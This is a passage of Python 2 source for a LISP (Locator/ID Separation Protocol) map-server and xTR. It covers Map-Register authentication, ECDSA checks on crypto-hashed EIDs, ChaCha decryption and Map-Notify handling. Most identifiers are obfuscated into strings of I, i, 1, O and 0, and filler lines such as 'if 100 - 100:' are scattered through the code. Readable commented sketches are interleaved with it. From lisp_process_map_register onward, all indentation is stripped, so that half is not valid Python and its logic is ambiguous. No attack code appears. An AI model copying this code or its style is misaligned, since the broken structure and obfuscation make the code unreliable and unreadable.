                II11Ii1i1iiII = I1iiiII1Ii1i1[0].rle.rle_nodes

            for Iii in II11Ii1i1iiII:
                OOooOo00Ooo.append(Iii.address)
                o0ooOO0OOO00O0.append(Iii.address.print_address_no_iid())

            lprint("Notify existing RLE-nodes {}".format(o0ooOO0OOO00O0))
        else:
            for i1III111 in I1iiiII1Ii1i1:
                if (i1III111.is_rtr()): OOooOo00Ooo.append(i1III111.rloc)

        #
        # Fall back to the ITRs registered for the unicast source entry.
        #
        o00O0o0O0O0o = (len(OOooOo00Ooo) != 0)
        if (o00O0o0O0O0o == False):
            o0o000 = lisp_site_eid_lookup(oOOooo000OoO[0], Oo00oO0, False)
            if (o0o000 == None): continue

            for i1III111 in o0o000.registered_rlocs:
                if (i1III111.rloc.is_null()): continue
                OOooOo00Ooo.append(i1III111.rloc)

        if (len(OOooOo00Ooo) == 0):
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".format(
                green(IiIIiIII1I1i.print_eid_tuple(), False)))
            continue

        #
        # Send one Map-Notify per target, pacing with a short sleep.
        #
        for iI11IiI1 in OOooOo00Ooo:
            lprint("Build Map-Notify to {}TR {} for {}".format(
                "R" if o00O0o0O0O0o else "x",
                red(iI11IiI1.print_address_no_iid(), False),
                green(IiIIiIII1I1i.print_eid_tuple(), False)))

            i1I1iO0000oOooOoO0 = [IiIIiIII1I1i.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, IiIIiIII1I1i,
                i1I1iO0000oOooOoO0, iI11IiI1)
            time.sleep(.001)
    return

#
# lisp_find_sig_in_rloc_set
#
# Return the first RLOC-record in a set that carries a JSON signature,
# or None when no signature is present.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
    for IiIIi1IiiIiI in range(rloc_count):
        I1Ii11iI = lisp_rloc_record()
        packet = I1Ii11iI.decode(packet, None)
        i1iii = I1Ii11iI.json
        if (i1iii == None): continue

        try:
            i1iii = json.loads(i1iii.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        if (i1iii.has_key("signature") == False): continue
        return(I1Ii11iI)
    return(None)

#
# lisp_get_eid_hash
#
# Return the crypto-hash part of an EID as a hex string, or None when the
# EID is not covered by a configured eid-prefix.
#
def lisp_get_eid_hash(eid):

    #
    # Find a configured eid-prefix that covers this EID; 128 minus the
    # prefix mask-length gives the number of hash bits.
    #
    iI1iIIIIiiii = None
    for IiI1Iiii in lisp_eid_hashes:

        #
        # Instance-id -1 is a wildcard that matches any instance-id.
        #
        o0OoO0000o = IiI1Iiii.instance_id
        if (o0OoO0000o == -1): IiI1Iiii.instance_id = eid.instance_id

        ii1iOo = eid.is_more_specific(IiI1Iiii)
        IiI1Iiii.instance_id = o0OoO0000o
        if (ii1iOo):
            iI1iIIIIiiii = 128 - IiI1Iiii.mask_len
            break

    if (iI1iIIIIiiii == None): return(None)

    #
    # Extract the hash bits 16 at a time, building "xxxx:" groups from
    # least- to most-significant.
    #
    ii1i1II11II1i = eid.address
    II111i1II1i1I = ""
    for IiIIi1IiiIiI in range(0, iI1iIIIIiiii / 16):
        IiiIIi1 = ii1i1II11II1i & 0xffff
        IiiIIi1 = hex(IiiIIi1)[2:-1]
        II111i1II1i1I = IiiIIi1.zfill(4) + ":" + II111i1II1i1I
        ii1i1II11II1i >>= 16

    if (iI1iIIIIiiii % 16 != 0):
        IiiIIi1 = ii1i1II11II1i & 0xff
        IiiIIi1 = hex(IiiIIi1)[2:-1]
        II111i1II1i1I = IiiIIi1.zfill(2) + ":" + II111i1II1i1I
    return(II111i1II1i1I[0:-1])

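#
# Illustrative sketch with hypothetical values: lisp_get_eid_hash() above
# walks the hash bits 16 at a time, building "xxxx:" groups from least-
# to most-significant. For a 32-bit hash of 0xdeadbeef this expansion
# returns "dead:beef":
#
def _example_eid_hash_expand(address, hash_bits):
    text = ""
    for i in range(0, hash_bits / 16):
        word = address & 0xffff
        text = hex(word)[2:].zfill(4) + ":" + text
        address >>= 16
    return(text[0:-1])
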
#
# lisp_lookup_public_key
#
# Look up the public key registered for a crypto-hashed EID. Returns
# [hash-eid, public-key, lookup-succeeded].
#
def lisp_lookup_public_key(eid):
    o0OoO0000o = eid.instance_id

    #
    # Build a distinguished-name EID "hash-<eid-hash>" to look up.
    #
    oOoIiIi = lisp_get_eid_hash(eid)
    if (oOoIiIi == None): return([None, None, False])

    oOoIiIi = "hash-" + oOoIiIi
    ii1iIIi = lisp_address(LISP_AFI_NAME, oOoIiIi, len(oOoIiIi), o0OoO0000o)
    IIi1iiIII11 = lisp_address(LISP_AFI_NONE, "", 0, o0OoO0000o)

    o0o000 = lisp_site_eid_lookup(ii1iIIi, IIi1iiIII11, True)
    if (o0o000 == None): return([ii1iIIi, None, False])

    #
    # Search the registered RLOCs for a JSON public-key record.
    #
    I1i1ii = None
    for I1IIiIIIii in o0o000.registered_rlocs:
        II = I1IIiIIIii.json
        if (II == None): continue
        try:
            II = json.loads(II.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(
                oOoIiIi))
            return([ii1iIIi, None, False])

        if (II.has_key("public-key") == False): continue
        I1i1ii = II["public-key"]
        break

    return([ii1iIIi, I1i1ii, True])

#
# lisp_verify_cga_sig
#
# Verify the ECDSA signature in an RLOC-record against the public key
# registered for the crypto-hashed signature-EID.
#
def lisp_verify_cga_sig(eid, rloc_record):

    #
    # Use the signature-EID from the JSON blob when the mapping EID is
    # not itself a crypto-hashed EID.
    #
    O0OO0OoO00oOo = json.loads(rloc_record.json.json_string)

    if (lisp_get_eid_hash(eid)):
        Oo0o0ooOo0 = eid
    elif (O0OO0OoO00oOo.has_key("signature-eid")):
        Ii11i11 = O0OO0OoO00oOo["signature-eid"]
        Oo0o0ooOo0 = lisp_address(LISP_AFI_IPV6, Ii11i11, 0, 0)
    else:
        lprint("  No signature-eid found in RLOC-record")
        return(False)

    #
    # Look up the public key registered for the crypto-hashed EID.
    #
    ii1iIIi, I1i1ii, o0OOOooO = lisp_lookup_public_key(Oo0o0ooOo0)
    if (ii1iIIi == None):
        I11i11i1 = green(Oo0o0ooOo0.print_address(), False)
        lprint("  Could not parse hash in EID {}".format(I11i11i1))
        return(False)

    ooOoOO0o = "found" if o0OOOooO else bold("not found", False)
    I11i11i1 = green(ii1iIIi.print_address(), False)
    lprint("  Lookup for crypto-hashed EID {} {}".format(I11i11i1, ooOoOO0o))
    if (o0OOOooO == False): return(False)

    if (I1i1ii == None):
        lprint("  RLOC-record with public-key not found")
        return(False)

    iI11i11ii11 = I1i1ii[0:8] + "..." + I1i1ii[-8::]
    lprint("  RLOC-record with public-key '{}' found".format(iI11i11ii11))

    #
    # Base64-decode the signature from the JSON blob.
    #
    II1I1IIi1111I = O0OO0OoO00oOo["signature"]
    try:
        O0OO0OoO00oOo = binascii.a2b_base64(II1I1IIi1111I)
    except:
        lprint("  Incorrect padding in signature string")
        return(False)

    i111Ii = len(O0OO0OoO00oOo)
    if (i111Ii & 1):
        lprint("  Signature length is odd, length {}".format(i111Ii))
        return(False)

    #
    # The signature is computed over the printed signature-EID.
    #
    IIIiiI1I = Oo0o0ooOo0.print_address()

    #
    # Import the PEM-encoded public key.
    #
    I1i1ii = binascii.a2b_base64(I1i1ii)
    try:
        Oo000O000 = ecdsa.VerifyingKey.from_pem(I1i1ii)
    except:
        IiiiIi = bold("Bad public-key", False)
        lprint("  {}, not in PEM format".format(IiiiIi))
        return(False)

    #
    # Verify the signature over the signature-EID string.
    #
    try:
        OO = Oo000O000.verify(O0OO0OoO00oOo, IIIiiI1I, hashfunc=hashlib.sha256)
    except:
        lprint("  Signature library failed for signature data '{}'".format(
            IIIiiI1I))
        lprint("  Signature used '{}'".format(II1I1IIi1111I))
        return(False)
    return(OO)

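#
# Illustrative sketch, not used by the map-server: the verification above
# expects a PEM-encoded ECDSA public key and a signature computed over the
# printed signature-EID with sha256. Signing pairs with it roughly like
# this (assumes the same python-ecdsa package; key choice is hypothetical):
#
def _example_sign_signature_eid(signature_eid_str):
    import binascii, hashlib
    import ecdsa

    key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    sig = key.sign(signature_eid_str, hashfunc=hashlib.sha256)

    # A registration would carry the PEM public-key and base64 signature.
    return(key.get_verifying_key().to_pem(), binascii.b2a_base64(sig))
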
#
# lisp_remove_eid_from_map_notify_queue
#
# Remove queued Map-Notifies that cover any EID in the supplied list,
# cancelling their retransmit timers.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):

    Oo0Oo00O000 = []
    for o0oOo0oo0 in eid_list:
        for iiI1IiII1iI in lisp_map_notify_queue:
            Ii1ii1 = lisp_map_notify_queue[iiI1IiII1iI]
            if (o0oOo0oo0 not in Ii1ii1.eid_list): continue

            Oo0Oo00O000.append(iiI1IiII1iI)
            iiI1IOO00o0Oo0000 = Ii1ii1.retransmit_timer
            if (iiI1IOO00o0Oo0000): iiI1IOO00o0Oo0000.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".format(
                Ii1ii1.nonce_key, green(o0oOo0oo0, False)))

    for iiI1IiII1iI in Oo0Oo00O000: lisp_map_notify_queue.pop(iiI1IiII1iI)
    return

#
# lisp_decrypt_map_register
#
# Decrypt an encrypted Map-Register with a configured site key.
#
def lisp_decrypt_map_register(packet):

    #
    # Check the encrypt-bit (bit 13) in the first 32-bit word; bits 14-16
    # carry the 3-bit key-id of the shared encryption key.
    #
    O0ooOoO0 = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    O00oOO0OO00 = (O0ooOoO0 >> 13) & 0x1
    if (O00oOO0OO00 == 0): return(packet)

    oo0Oo00oOO = (O0ooOoO0 >> 14) & 0x7

    try:
        II11iI11i1 = lisp_ms_encryption_keys[oo0Oo00oOO]
        II11iI11i1 = II11iI11i1.zfill(32)
        iiI1iiIiiiI1I = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(
            oo0Oo00oOO))
        return(None)

    OooOOOoOoo0O0 = bold("Decrypt", False)
    lprint("{} Map-Register with key-id {}".format(OooOOOoOoo0O0, oo0Oo00oOO))

    #
    # ChaCha-decrypt everything after the first 32-bit word.
    #
    iiii1Ii1iii = chacha.ChaCha(II11iI11i1, iiI1iiIiiiI1I).decrypt(packet[4::])
    return(packet[0:4] + iiii1Ii1iii)

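#
# Illustrative sketch with a hypothetical header word: the decrypt logic
# above pulls the encrypt-bit (bit 13) and the 3-bit key-id (bits 14-16)
# out of the first 32-bit word of the Map-Register. The bit arithmetic in
# isolation:
#
def _example_map_register_header_bits(first_four_bytes):
    import socket, struct

    word = socket.ntohl(struct.unpack("I", first_four_bytes)[0])
    encrypt_bit = (word >> 13) & 0x1
    key_id = (word >> 14) & 0x7
    return(encrypt_bit, key_id)
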
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 100 - 100: i11iIiiIii - oO0o + iIii1I11I1II1 * OoOoOO00 % OOooOOo % i11iIiiIii
if 26 - 26: O0
if 97 - 97: OOooOOo + I11i % I1Ii111 % i11iIiiIii / I1ii11iIi11i
if 21 - 21: O0 + iIii1I11I1II1 / i11iIiiIii . OOooOOo * i1IIi
if 3 - 3: i1IIi % o0oOOo0O0Ooo + OoOoOO00
if 32 - 32: OoO0O00 . Oo0Ooo * iIii1I11I1II1
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
I1ooo0o00o0Oooo = lisp_map_register ( )
OoO , packet = I1ooo0o00o0Oooo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
I1ooo0o00o0Oooo . sport = sport
I1ooo0o00o0Oooo . print_map_register ( )
OOOO00OO0O0o = True
if ( I1ooo0o00o0Oooo . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
OOOO00OO0O0o = True
if ( I1ooo0o00o0Oooo . alg_id == LISP_SHA_256_128_ALG_ID ) :
OOOO00OO0O0o = False
OO0O0O00Oo = [ ]
ooo000O0O = None
iI111iIII1I = packet
OOooOo0o0oOoo = [ ]
ooOO0o0O0 = I1ooo0o00o0Oooo . record_count
for IiIIi1IiiIiI in range ( ooOO0o0O0 ) :
i111iII = lisp_eid_record ( )
I1Ii11iI = lisp_rloc_record ( )
packet = i111iII . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
i111iII . print_record ( " " , False )
o0o000 = lisp_site_eid_lookup ( i111iII . eid , i111iII . group ,
False )
i11iiii11iIii = o0o000 . print_eid_tuple ( ) if o0o000 else None
if ( o0o000 and o0o000 . accept_more_specifics == False ) :
if ( o0o000 . eid_record_matches ( i111iII ) == False ) :
O0Ii1IiiiI = o0o000 . parent_for_more_specifics
if ( O0Ii1IiiiI ) : o0o000 = O0Ii1IiiiI
Ii1I111IiI11I = ( o0o000 and o0o000 . accept_more_specifics )
if ( Ii1I111IiI11I ) :
Oo0oOO = lisp_site_eid ( o0o000 . site )
Oo0oOO . dynamic = True
Oo0oOO . eid . copy_address ( i111iII . eid )
Oo0oOO . group . copy_address ( i111iII . group )
Oo0oOO . parent_for_more_specifics = o0o000
Oo0oOO . add_cache ( )
Oo0oOO . inherit_from_ams_parent ( )
o0o000 . more_specific_registrations . append ( Oo0oOO )
o0o000 = Oo0oOO
else :
o0o000 = lisp_site_eid_lookup ( i111iII . eid , i111iII . group ,
True )
I11i11i1 = i111iII . print_eid_tuple ( )
if ( o0o000 == None ) :
iiiII = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( iiiII , green ( I11i11i1 , False ) ,
", matched non-ams {}" . format ( green ( i11iiii11iIii , False ) if i11iiii11iIii else "" ) ) )
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
continue
ooo000O0O = o0o000 . site
if ( Ii1I111IiI11I ) :
oOo = o0o000 . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oOo , False ) , ooo000O0O . site_name , green ( I11i11i1 , False ) ) )
else :
oOo = green ( o0o000 . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oOo , ooo000O0O . site_name , green ( I11i11i1 , False ) ) )
if ( ooo000O0O . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( ooo000O0O . site_name ) )
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
continue
I1I1I1 = I1ooo0o00o0Oooo . key_id
if ( ooo000O0O . auth_key . has_key ( I1I1I1 ) ) :
o0Oooo00oO0o00 = ooo000O0O . auth_key [ I1I1I1 ]
else :
o0Oooo00oO0o00 = ""
I1iiIIiIII1i = lisp_verify_auth ( OoO , I1ooo0o00o0Oooo . alg_id ,
I1ooo0o00o0Oooo . auth_data , o0Oooo00oO0o00 )
oo0o00oOOooO = "dynamic " if o0o000 . dynamic else ""
O0o = bold ( "passed" if I1iiIIiIII1i else "failed" , False )
I1I1I1 = "key-id {}" . format ( I1I1I1 ) if I1I1I1 == I1ooo0o00o0Oooo . key_id else "bad key-id {}" . format ( I1ooo0o00o0Oooo . key_id )
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( O0o , oo0o00oOOooO , green ( I11i11i1 , False ) , I1I1I1 ) )
iI1I1ii = True
OooOo = ( lisp_get_eid_hash ( i111iII . eid ) != None )
if ( OooOo or o0o000 . require_signature ) :
I1i111i1ii11 = "Required " if o0o000 . require_signature else ""
I11i11i1 = green ( I11i11i1 , False )
I1IIiIIIii = lisp_find_sig_in_rloc_set ( packet , i111iII . rloc_count )
if ( I1IIiIIIii == None ) :
iI1I1ii = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( I1i111i1ii11 ,
bold ( "failed" , False ) , I11i11i1 ) )
else :
iI1I1ii = lisp_verify_cga_sig ( i111iII . eid , I1IIiIIIii )
O0o = bold ( "passed" if iI1I1ii else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( I1i111i1ii11 , O0o , I11i11i1 ) )
if ( I1iiIIiIII1i == False or iI1I1ii == False ) :
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
continue
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
O0Ii1IiiiI = o0o000
O0Ii1IiiiI . inconsistent_registration = False
if ( o0o000 . group . is_null ( ) ) :
if ( O0Ii1IiiiI . site_id != I1ooo0o00o0Oooo . site_id ) :
O0Ii1IiiiI . site_id = I1ooo0o00o0Oooo . site_id
O0Ii1IiiiI . registered = False
O0Ii1IiiiI . individual_registrations = { }
O0Ii1IiiiI . registered_rlocs = [ ]
lisp_registered_count -= 1
Oo000O000 = source . address + I1ooo0o00o0Oooo . xtr_id
if ( o0o000 . individual_registrations . has_key ( Oo000O000 ) ) :
o0o000 = o0o000 . individual_registrations [ Oo000O000 ]
else :
o0o000 = lisp_site_eid ( ooo000O0O )
o0o000 . eid . copy_address ( O0Ii1IiiiI . eid )
o0o000 . group . copy_address ( O0Ii1IiiiI . group )
o0o000 . encrypt_json = O0Ii1IiiiI . encrypt_json
O0Ii1IiiiI . individual_registrations [ Oo000O000 ] = o0o000
else :
o0o000 . inconsistent_registration = o0o000 . merge_register_requested
o0o000 . map_registers_received += 1
IiiiIi = ( o0o000 . is_rloc_in_rloc_set ( source ) == False )
if ( i111iII . record_ttl == 0 and IiiiIi ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
continue
ii1iii11IiIii = o0o000 . registered_rlocs
o0o000 . registered_rlocs = [ ]
iII1I1iII1i = packet
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
packet = I1Ii11iI . decode ( packet , None , o0o000 . encrypt_json )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
I1Ii11iI . print_record ( " " )
if ( len ( ooo000O0O . allowed_rlocs ) > 0 ) :
oo0o00OO = I1Ii11iI . rloc . print_address ( )
if ( ooo000O0O . allowed_rlocs . has_key ( oo0o00OO ) == False ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oo0o00OO , False ) ) )
o0o000 . registered = False
packet = I1Ii11iI . end_of_rlocs ( packet ,
i111iII . rloc_count - OO00O0O - 1 )
break
I1IIiIIIii = lisp_rloc ( )
I1IIiIIIii . store_rloc_from_record ( I1Ii11iI , None , source )
if ( source . is_exact_match ( I1IIiIIIii . rloc ) ) :
I1IIiIIIii . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
o0o000 . registered_rlocs . append ( I1IIiIIIii )
oO0000O0OOO = ( o0o000 . do_rloc_sets_match ( ii1iii11IiIii ) == False )
if ( I1ooo0o00o0Oooo . map_register_refresh and oO0000O0OOO and
o0o000 . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
o0o000 . registered_rlocs = ii1iii11IiIii
continue
if ( o0o000 . registered == False ) :
o0o000 . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
o0o000 . last_registered = lisp_get_timestamp ( )
o0o000 . registered = ( i111iII . record_ttl != 0 )
o0o000 . last_registerer = source
o0o000 . auth_sha1_or_sha2 = OOOO00OO0O0o
o0o000 . proxy_reply_requested = I1ooo0o00o0Oooo . proxy_reply_requested
o0o000 . lisp_sec_present = I1ooo0o00o0Oooo . lisp_sec_present
o0o000 . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
o0o000 . mobile_node_requested = I1ooo0o00o0Oooo . mobile_node
o0o000 . merge_register_requested = I1ooo0o00o0Oooo . merge_register_requested
o0o000 . use_register_ttl_requested = I1ooo0o00o0Oooo . use_ttl_for_timeout
if ( o0o000 . use_register_ttl_requested ) :
o0o000 . register_ttl = i111iII . store_ttl ( )
else :
o0o000 . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
o0o000 . xtr_id_present = I1ooo0o00o0Oooo . xtr_id_present
if ( o0o000 . xtr_id_present ) :
o0o000 . xtr_id = I1ooo0o00o0Oooo . xtr_id
o0o000 . site_id = I1ooo0o00o0Oooo . site_id
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
if ( O0Ii1IiiiI . merge_in_site_eid ( o0o000 ) ) :
OO0O0O00Oo . append ( [ i111iII . eid , i111iII . group ] )
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if ( I1ooo0o00o0Oooo . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , O0Ii1IiiiI , I1ooo0o00o0Oooo ,
i111iII )
if ( oO0000O0OOO == False ) : continue
if ( len ( OO0O0O00Oo ) != 0 ) : continue
OOooOo0o0oOoo . append ( o0o000 . print_eid_tuple ( ) )
i111iII = i111iII . encode ( )
i111iII += iII1I1iII1i
i1I1iO0000oOooOoO0 = [ o0o000 . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
for I1IIiIIIii in ii1iii11IiIii :
if ( I1IIiIIIii . map_notify_requested == False ) : continue
if ( I1IIiIIIii . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , i111iII , i1I1iO0000oOooOoO0 , 1 , I1IIiIIIii . rloc ,
LISP_CTRL_PORT , I1ooo0o00o0Oooo . nonce , I1ooo0o00o0Oooo . key_id ,
I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len , ooo000O0O , False )
lisp_notify_subscribers ( lisp_sockets , i111iII , o0o000 . eid , ooo000O0O )
if ( len ( OO0O0O00Oo ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , OO0O0O00Oo )
if ( I1ooo0o00o0Oooo . merge_register_requested ) : return
if ( I1ooo0o00o0Oooo . map_notify_requested and ooo000O0O != None ) :
lisp_build_map_notify ( lisp_sockets , iI111iIII1I , OOooOo0o0oOoo ,
I1ooo0o00o0Oooo . record_count , source , sport , I1ooo0o00o0Oooo . nonce ,
I1ooo0o00o0Oooo . key_id , I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len ,
ooo000O0O , True )
return
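#
# Condensed sketch of the authentication lookup used above, assuming a site
# object whose auth_key table is keyed by key-id (the helper name is
# hypothetical); an unknown key-id falls back to "" just like the code
# above does before calling lisp_verify_auth():
#
def _example_verify_map_register(auth_packet, map_register, site):
    password = site.auth_key.get(map_register.key_id, "")
    return lisp_verify_auth(auth_packet, map_register.alg_id,
        map_register.auth_data, password)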
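#
# lisp_process_multicast_map_notify
#
# Process a Map-Notify that carries (S,G) records. Update matching map-cache
# entries (creating gleaned-permitted ones when allowed) with the RLE from
# the RLOC-record, carrying packet statistics over from the previous
# RLOC-set.
#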
def lisp_process_multicast_map_notify ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
Ii1ii1 . print_notify ( )
if ( Ii1ii1 . record_count == 0 ) : return
i1ii = Ii1ii1 . eid_records
for IiIIi1IiiIiI in range ( Ii1ii1 . record_count ) :
i111iII = lisp_eid_record ( )
i1ii = i111iII . decode ( i1ii )
if ( i1ii == None ) : return
i111iII . print_record ( " " , False )
o0o000Oo = lisp_map_cache_lookup ( i111iII . eid , i111iII . group )
if ( o0o000Oo == None ) :
iII1 , O0O , IIIi1i1iIIIi = lisp_allow_gleaning ( i111iII . eid , i111iII . group ,
None )
if ( iII1 == False ) : continue
o0o000Oo = lisp_mapping ( i111iII . eid , i111iII . group , [ ] )
o0o000Oo . add_cache ( )
if ( o0o000Oo . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ) )
continue
o0o000Oo . mapping_source = None if source == "lisp-etr" else source
o0o000Oo . map_cache_ttl = i111iII . store_ttl ( )
if ( len ( o0o000Oo . rloc_set ) != 0 and i111iII . rloc_count == 0 ) :
o0o000Oo . rloc_set = [ ]
o0o000Oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0o000Oo )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ) )
continue
oOOOOOo0 = o0o000Oo . rtrs_in_rloc_set ( )
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
i1ii = I1Ii11iI . decode ( i1ii , None )
I1Ii11iI . print_record ( " " )
if ( i111iII . group . is_null ( ) ) : continue
if ( I1Ii11iI . rle == None ) : continue
I1i1IIiIIiIiIi = o0o000Oo . rloc_set [ 0 ] . stats if len ( o0o000Oo . rloc_set ) != 0 else None
I1IIiIIIii = lisp_rloc ( )
I1IIiIIIii . store_rloc_from_record ( I1Ii11iI , None , o0o000Oo . mapping_source )
if ( I1i1IIiIIiIiIi != None ) : I1IIiIIIii . stats = copy . deepcopy ( I1i1IIiIIiIiIi )
if ( oOOOOOo0 and I1IIiIIIii . is_rtr ( ) == False ) : continue
o0o000Oo . rloc_set = [ I1IIiIIIii ]
o0o000Oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0o000Oo )
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ,
I1IIiIIIii . rle . print_rle ( False , True ) ) )
return
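#
# Note on the RLOC replacement above: when the RLOC-set of an (S,G) entry is
# rebuilt from a Map-Notify, the previous entry's counters survive because
# its stats are deep-copied into the new lisp_rloc. A minimal sketch:
#
def _example_preserve_rloc_stats(old_rloc_set, new_rloc):
    if len(old_rloc_set) != 0:
        new_rloc.stats = copy.deepcopy(old_rloc_set[0].stats)
    return new_rloc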
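#
# lisp_process_map_notify
#
# Authenticate a Map-Notify against the configured Map-Server it came from,
# forward (S,G) EID-records to the lisp-itr process over IPC, and answer
# with a Map-Notify-Ack.
#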
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
IiiiIi1iiii11 = Ii1ii1 . decode ( orig_packet )
if ( IiiiIi1iiii11 == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
Ii1ii1 . print_notify ( )
IiII1iiI = source . print_address ( )
if ( Ii1ii1 . alg_id != 0 or Ii1ii1 . auth_len != 0 ) :
ii1iOo = None
for Oo000O000 in lisp_map_servers_list :
if ( Oo000O000 . find ( IiII1iiI ) == - 1 ) : continue
ii1iOo = lisp_map_servers_list [ Oo000O000 ]
if ( ii1iOo == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( IiII1iiI ) )
return
ii1iOo . map_notifies_received += 1
I1iiIIiIII1i = lisp_verify_auth ( IiiiIi1iiii11 , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , ii1iOo . password )
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if I1iiIIiIII1i else "failed" ) )
if ( I1iiIIiIII1i == False ) : return
else :
ii1iOo = lisp_ms ( IiII1iiI , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
i1ii = Ii1ii1 . eid_records
if ( Ii1ii1 . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , i1ii , Ii1ii1 , ii1iOo )
return
i111iII = lisp_eid_record ( )
IiiiIi1iiii11 = i111iII . decode ( i1ii )
if ( IiiiIi1iiii11 == None ) : return
i111iII . print_record ( " " , False )
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
IiiiIi1iiii11 = I1Ii11iI . decode ( IiiiIi1iiii11 , None )
if ( IiiiIi1iiii11 == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
I1Ii11iI . print_record ( " " )
if ( i111iII . group . is_null ( ) == False ) :
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( i111iII . print_eid_tuple ( ) , False ) ) )
iiiii1i1 = lisp_control_packet_ipc ( orig_packet , IiII1iiI , "lisp-itr" , 0 )
lisp_ipc ( iiiii1i1 , lisp_sockets [ 2 ] , "lisp-core-pkt" )
lisp_send_map_notify_ack ( lisp_sockets , i1ii , Ii1ii1 , ii1iOo )
return
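#
# lisp_process_map_notify_ack
#
# Authenticate a Map-Notify-Ack with the site's auth-key and remove the
# pending Map-Notify, keyed by nonce and xTR address, from the retransmit
# queue.
#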
def lisp_process_map_notify_ack ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
Ii1ii1 . print_notify ( )
if ( Ii1ii1 . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
i111iII = lisp_eid_record ( )
if ( i111iII . decode ( Ii1ii1 . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
i111iII . print_record ( " " , False )
I11i11i1 = i111iII . print_eid_tuple ( )
if ( Ii1ii1 . alg_id != LISP_NONE_ALG_ID and Ii1ii1 . auth_len != 0 ) :
o0o000 = lisp_sites_by_eid . lookup_cache ( i111iII . eid , True )
if ( o0o000 == None ) :
iiiII = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( iiiII , green ( I11i11i1 , False ) ) )
return
ooo000O0O = o0o000 . site
ooo000O0O . map_notify_acks_received += 1
I1I1I1 = Ii1ii1 . key_id
if ( ooo000O0O . auth_key . has_key ( I1I1I1 ) ) :
